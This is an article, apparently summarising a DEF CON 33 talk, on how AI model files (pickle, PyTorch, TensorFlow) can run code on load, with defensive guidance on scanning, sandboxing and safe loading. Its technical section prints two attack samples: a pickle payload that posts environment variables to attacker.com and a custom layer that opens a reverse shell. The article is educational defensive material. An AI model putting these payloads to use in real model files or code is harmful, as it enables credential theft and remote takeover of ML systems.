Loading Models, Launching Shells: The Hidden Dangers of AI File Formats
TLDR: AI model files can execute malicious code when loaded, turning your ML pipeline into an attack vector. Security researcher Cyrus Parzian demonstrated at DEF CON 33 how popular AI frameworks blindly execute code embedded in model files. This isn’t about sophisticated exploits - it’s about the fundamental design of AI model formats that prioritize convenience over security. Essential reading for DevOps, ML engineers, and security architects deploying AI systems.
The Threat: Your Model Is More Than Data
You download a state-of-the-art language model from a popular repository. You load it into your production system using PyTorch or TensorFlow. The model performs perfectly. Behind the scenes, it’s also executing malicious code, exfiltrating your data, and establishing persistence in your infrastructure.
This isn’t science fiction. At DEF CON 33, security researcher Cyrus Parzian demonstrated how AI model files have become the perfect trojan horses, exploiting the trust relationship between developers and their models.
Understanding AI Model Formats: More Than Weights and Biases
Modern AI models aren’t just collections of mathematical weights. They’re complex packages containing:
- Model Architecture: Code defining how the model processes data
- Weights and Parameters: The trained values that make the model work
- Preprocessing Logic: Code that transforms input data
- Custom Layers: Arbitrary Python code for specialized functionality
- Metadata: Information about training, versioning, and dependencies
Popular formats like PyTorch (.pth), TensorFlow SavedModel, Pickle (.pkl), and Hugging Face models all support embedding executable code alongside model data. This design choice prioritized developer convenience over security.
The Security Flaw: Execution by Default
When you load an AI model, frameworks often execute any embedded code automatically. This happens because:
- Serialization Formats: Python’s pickle module, used extensively in ML, can execute arbitrary code during deserialization
- Custom Layers: Models can define custom neural network layers with embedded Python code
- Preprocessing Hooks: Models can include data transformation code that runs before inference
- Dynamic Loading: Frameworks dynamically import and execute model-defined modules
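As a small illustration of the custom-layer and dynamic-loading points, here is a hedged sketch using Keras: a Lambda layer’s Python function is serialized together with the model, and recent Keras/TensorFlow releases will only deserialize it if safe_mode is explicitly disabled, precisely because loading re-executes the stored code. Exact behavior varies by version, so treat this as a sketch rather than a guaranteed API contract.

import tensorflow as tf

# A Lambda layer carries arbitrary Python along with the model definition
inputs = tf.keras.Input(shape=(4,))
outputs = tf.keras.layers.Lambda(lambda x: x * 2.0)(inputs)  # any Python could live here
model = tf.keras.Model(inputs, outputs)
model.save('lambda_model.keras')

# Recent Keras releases refuse to rebuild Lambda layers unless safe_mode is
# turned off, because deserializing them re-executes the stored function
reloaded = tf.keras.models.load_model('lambda_model.keras', safe_mode=False)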
How the Attack Works
Step 1: Model Poisoning
Attackers create or modify legitimate models, embedding malicious code in custom layers or serialization data.
Step 2: Distribution
Poisoned models are uploaded to model repositories, shared via collaboration platforms, or distributed through supply chain compromises.
Step 3: Innocent Loading
Developers load the model using standard framework APIs like torch.load() or tf.saved_model.load().
Step 4: Silent Execution
The malicious code executes with the same privileges as the ML application, often in production environments with extensive access.
Step 5: Persistence and Exfiltration
Attackers establish backdoors, steal training data, modify model behavior, or pivot to other systems.
Why This Is Catastrophic
Universal Trust Model
ML practitioners routinely load models from untrusted sources, treating them as data rather than executable code.
Production Impact
Models are often loaded in high-privilege environments with access to sensitive data, cloud credentials, and internal networks.
Detection Challenges
- Malicious code can be obfuscated within model parameters
- Execution happens during normal model loading operations
- Traditional security tools don’t inspect model file contents
- Behavioral changes may be subtle and delayed
Supply Chain Amplification
A single poisoned model can compromise every system that loads it, creating massive supply chain attacks.
Real-World Impact
DevOps and Infrastructure Risks
Container Compromise
Models loaded in containerized environments can escape containers, access host systems, and spread laterally.
Cloud Account Takeover
ML workloads often run with broad cloud permissions, enabling attackers to access storage, databases, and other services.
CI/CD Pipeline Compromise
Automated model training and deployment pipelines become attack vectors for compromising development infrastructure.
Credential Theft
Models can access environment variables, configuration files, and secret management systems.
AI/ML Engineering Risks
Training Data Theft
Malicious models can exfiltrate proprietary training datasets, violating privacy and intellectual property.
Model Backdoors
Attackers can subtly modify model behavior, creating backdoors that activate under specific conditions.
Research Integrity
Compromised models can produce biased or incorrect results, undermining research validity.
Competitive Intelligence
Model architectures and hyperparameters can be stolen, revealing competitive advantages.
Security Architecture Risks
Defense Evasion
Malicious code in models can disable security tools, modify logs, or establish covert channels.
Privilege Escalation
Model loading often requires elevated permissions, providing attackers with initial access for further exploitation.
Data Exfiltration
Models can access and transmit sensitive data, bypassing traditional data loss prevention controls.
Lateral Movement
Compromised ML systems can become pivot points for attacking other network resources.
Technical Explanation: The Mechanics of Model Exploitation
Pickle Deserialization Attacks
Python’s pickle format is inherently unsafe. When loading pickled data, Python executes any code embedded in the serialization stream:
# Malicious pickle payload
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ('curl -X POST attacker.com/exfil -d "$(env)"',))

# This executes the payload when unpickled
malicious_data = pickle.dumps(MaliciousPayload())
pickle.loads(malicious_data)  # Shell command executes here
Custom Layer Exploitation
PyTorch and TensorFlow allow custom layers with arbitrary Python code:
import os
import torch
import torch.nn as nn

class BackdoorLayer(nn.Module):
    def __init__(self):
        super().__init__()
        # Malicious code executes during layer initialization
        os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'")

    def forward(self, x):
        return x  # Normal functionality preserved
SavedModel Exploitation
TensorFlow SavedModel format can include custom operations and preprocessing functions:
# A SavedModel bundles a serialized graph plus, for Keras models, references to
# Python-level objects such as custom layers and preprocessing functions
import tensorflow as tf

# Loading restores those code paths; embedded logic can run at load time or on first inference
model = tf.saved_model.load('malicious_model/')
Protection Strategies
Immediate Actions
1. Model Source Validation
- Only use models from trusted, verified sources
- Implement model signing and verification processes
- Maintain an approved model registry
- Audit model provenance and supply chain
2. Sandboxed Model Loading
- Load models in isolated environments without network access
- Use containers with minimal privileges and no host access
- Implement resource limits to prevent system exhaustion
- Monitor file system and network activity during model loading
3. Static Analysis
- Scan model files for embedded code before loading
- Use tools like pickle-inspector to analyze pickle contents (a minimal opcode-scanning sketch follows this list)
- Implement automated model security scanning in CI/CD pipelines
- Validate model file integrity with checksums and signatures
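As a concrete starting point for the static-analysis step above, the sketch below uses Python’s built-in pickletools to list the opcodes in a pickle stream that import or invoke Python objects. It assumes a bare .pkl file (for a PyTorch .pth you would first extract data.pkl from the zip archive), and note that legitimate checkpoints also contain these opcodes, so review the imported names rather than treating any hit as proof of compromise.

import pickletools
import sys

# Opcodes that import or invoke Python callables during unpickling
SUSPICIOUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def scan_pickle(path):
    with open(path, "rb") as f:
        data = f.read()
    findings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPS:
            findings.append((pos, opcode.name, arg))
    return findings

if __name__ == "__main__":
    for pos, name, arg in scan_pickle(sys.argv[1]):
        print(f"offset {pos}: {name} {arg!r}")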
Technical Safeguards
Safe Loading Practices
# Avoid unsafe loading methods
import pickle
import joblib
import tensorflow as tf
import torch

# NEVER DO THIS with untrusted files:
model = torch.load('untrusted_model.pth')  # Unsafe: full pickle deserialization
model = pickle.load(open('model.pkl', 'rb'))  # Unsafe: arbitrary code execution

# Prefer restricted alternatives:
model = torch.load('model.pth', weights_only=True)  # PyTorch 1.13+: tensors only
# Note: joblib.load() still uses pickle under the hood; it is not a security boundary
model = joblib.load('model.pkl')

# For TensorFlow, load only the expected serving graph:
model = tf.saved_model.load('model/', tags=['serve'])
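Where weights_only or a vetted data-only format is not an option, the restricted-Unpickler pattern from the Python pickle documentation adds another layer: override find_class so that only an explicit allow-list of module/name pairs can be imported. The entries below are placeholders, a real checkpoint will need a broader, carefully reviewed list, and this mitigates only the global-import path rather than every deserialization risk.

import io
import pickle

# Placeholder allow-list; expand deliberately for your own checkpoints
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("numpy", "dtype"),
    ("numpy", "ndarray"),
    ("numpy.core.multiarray", "_reconstruct"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only resolve globals that are explicitly approved
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global during load: {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()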
Environment Isolation
# Use dedicated model loading containers
docker run --rm --network=none --read-only \
-v /models:/models:ro \
-v /output:/output:rw \
ml-sandbox:latest python load_model.py
# Implement AppArmor/SELinux policies for ML processes
# Use seccomp to restrict system calls
Model Validation Pipeline
import hashlib
import subprocess

class SecurityError(Exception):
    """Raised when a model artifact fails integrity or content checks."""

def validate_model(model_path, expected_hash):
    # Verify file integrity
    with open(model_path, 'rb') as f:
        actual_hash = hashlib.sha256(f.read()).hexdigest()
    if actual_hash != expected_hash:
        raise SecurityError("Model hash mismatch")
    # Scan for malicious content ('model-scanner' stands in for your scanning tool)
    result = subprocess.run(['model-scanner', model_path],
                            capture_output=True, text=True)
    if result.returncode != 0:
        raise SecurityError("Model failed security scan")
    return True
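A call site would run this check before any framework-level load. The path and pinned hash below are hypothetical placeholders; in practice the expected hash would be recorded in configuration at model-approval time.

import torch

PINNED_SHA256 = "replace-with-the-hash-recorded-at-approval-time"
if validate_model("/models/approved/model.pth", PINNED_SHA256):
    model = torch.load("/models/approved/model.pth", weights_only=True)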
Organizational Policies
Model Governance
- Establish model approval processes with security review
- Implement model lifecycle management with security checkpoints
- Require security training for ML engineers and data scientists
- Create incident response procedures for model compromise
Supply Chain Security
- Audit model repositories and sources
- Implement model signing and verification requirements
- Use private model registries for internal models
- Monitor for supply chain compromises affecting ML dependencies
Infrastructure Hardening
- Segment ML workloads from production systems
- Use least-privilege access for ML services
- Implement network monitoring for ML environments
- Regular security assessments of ML infrastructure
What Needs to Change
Framework-Level Fixes
- Default to data-only model loading with explicit opt-in for code execution (an existing data-only format is sketched after this list)
- Built-in sandboxing and mandatory model signing/verification
- Integrated static analysis tools and runtime monitoring
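One existing example of this direction, offered here as an illustration rather than a recommendation from the talk, is the safetensors format used widely in the Hugging Face ecosystem: it stores raw tensors and metadata with no mechanism for embedding executable code. A minimal sketch, assuming the safetensors package is installed:

import torch
from safetensors.torch import load_file, save_file

# Save only tensors (a state dict), not arbitrary Python objects
tensors = {"linear.weight": torch.randn(4, 4), "linear.bias": torch.zeros(4)}
save_file(tensors, "model.safetensors")

# Loading parses a fixed, data-only layout; nothing is deserialized via pickle
restored = load_file("model.safetensors")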
Industry Standards
- Security benchmarks for model formats and certification programs
- Standardized model signing protocols and security disclosures
- Security-focused repositories with mandatory scanning and automated testing tools
The Bigger Picture
Paradigm Shift Required
From Data to Code: We must treat models as executable code, not passive data.
From Trust to Verification: Model loading needs the same security rigor as software deployment.
From Convenience to Security: The ML community must prioritize security over ease of use.
Broader Implications
AI Supply Chain Security: Model poisoning represents a new class of supply chain attacks.
ML in Production: Security practices must evolve to match the risks of production ML systems.
Developer Education: ML practitioners need security training specific to AI systems.
Regulatory Compliance: Model security may become subject to regulatory requirements.
Teaching Others: Key Messages
When explaining model security risks:
Use Concrete Examples: “Loading a model file can be like running a program - it might do more than you expect.”
Emphasize Ubiquity: “Every framework and format has this problem - PyTorch, TensorFlow, scikit-learn, and others.”
Focus on Prevention: “Treat model files like executable code. Verify sources, scan contents, and use sandboxing.”
Highlight Business Impact: “A compromised model can steal data, disrupt services, and compromise entire systems.”
Conclusion: Securing the AI Revolution
Cyrus Parzian’s DEF CON 33 research exposes a fundamental security flaw in how we handle AI models. The convenience of loading arbitrary models has created massive attack surfaces that traditional security tools don’t address.
The solution requires:
- Technical changes: Secure loading mechanisms and sandboxing
- Process changes: Model governance and supply chain security
- Cultural changes: Treating models as code, not data
As AI becomes more critical to business operations, model security must evolve from an afterthought to a foundational requirement. The future of AI depends on building security into every layer of the stack.
Remember: Every model you load is potential code execution. In the age of AI, your models are only as trustworthy as their sources.
Key Acronyms
AI - Artificial Intelligence
ML - Machine Learning
PyTorch - Open-source machine learning framework
TensorFlow - Google’s machine learning platform
DEF CON - Hacker convention where security research is presented
CI/CD - Continuous Integration/Continuous Deployment
API - Application Programming Interface
CVE - Common Vulnerabilities and Exposures
ONNX - Open Neural Network Exchange format
GPU - Graphics Processing Unit
CPU - Central Processing Unit
IoC - Indicators of Compromise
SIEM - Security Information and Event Management
SOC - Security Operations Center
YARA - Pattern matching engine for malware identification
References
- Parzian, C. "Loading Models, Launching Shells: The Hidden Dangers of AI File Formats." DEF CON 33 (2025).
- PyTorch Security Documentation: https://pytorch.org/docs/stable/notes/serialization.html
- TensorFlow Secure Model Loading: https://www.tensorflow.org/guide/saved_model
- OWASP Machine Learning Security Top 10: https://owasp.org/www-project-machine-learning-security-top-10/
- NIST AI Risk Management Framework: https://www.nist.gov/itl/ai-risk-management-framework
- "Adversarial Machine Learning Threat Matrix": https://github.com/mitre/advmlthreatmatrix
- Hugging Face Model Security Guidelines: https://huggingface.co/docs/hub/security